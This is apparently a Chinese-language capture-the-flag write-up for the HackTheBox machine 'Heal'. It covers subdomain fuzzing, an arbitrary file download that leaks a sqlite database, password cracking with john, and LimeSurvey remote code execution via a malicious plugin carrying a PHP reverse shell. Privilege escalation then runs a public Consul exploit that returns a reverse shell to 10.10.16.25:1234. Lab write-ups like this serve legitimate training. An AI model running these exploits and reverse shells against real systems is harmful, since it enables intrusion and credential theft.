信息收集
nmap -sC -sV -T4 -Pn 10.10.11.48

记得添加下host映射然后访问
ffuf -w /usr/share/dnsrecon/dnsrecon/data/subdomains-top1mil-20000.txt -u http://heal.htb/ -H "Host:FUZZ.heal.htb" -fc 301
子域名爆破扫到一个api

可以看到是用的ruby先记录留着
在http://heal.htb/suery看到一个新的子域名加入host里面

访问一下发现一个用户名,先记录一下

扫一下这个子域名的目录
1 | dirsearch -u "http://take-survey.heal.htb/index.php/" -t 50 -i 200 |
访问admin会跳转到登录界面。有点慢先看其他的
漏洞利用
在一开始登录进去的页面有一个导出pdf的功能抓包看看

发现有download路由

看看能不能任意文件下载

发现可以又联想到之前ruby的页面去下载他的配置文件看看

把这个sqlite文件下载下来

解密下这个密码
john hash --wordlist=/usr/share/wordlists/rockyou.txt
得到密码:

然后去登录后台因为ssh连接不上

使用该exp进行利用
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
这里需要更改一下xml文件添加一个compatibility版本为6.0的否则无法反弹shell

然后打包上传压缩包
zip oceanzbz_zip config.xml php-rev.php

然后激活访问http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-rev.php

查看配置文件

发现密码,这里用ron用户登录。

提权
查看一下开放的端口

开放了很多这里8500端口转发出来其他的我测试了发现不是http服务
ssh -L 8500:127.0.0.1:8500 ron@heal.htb

随便点点找到信息泄漏版本

然后利用脚本拿shell
https://www.exploit-db.com/exploits/51117 python3 Hashicorp_Consul_v1.0RCE_EXP.py 127.0.0.1 8500 10.10.16.25 1234 0
这里的acltoken随便填就行
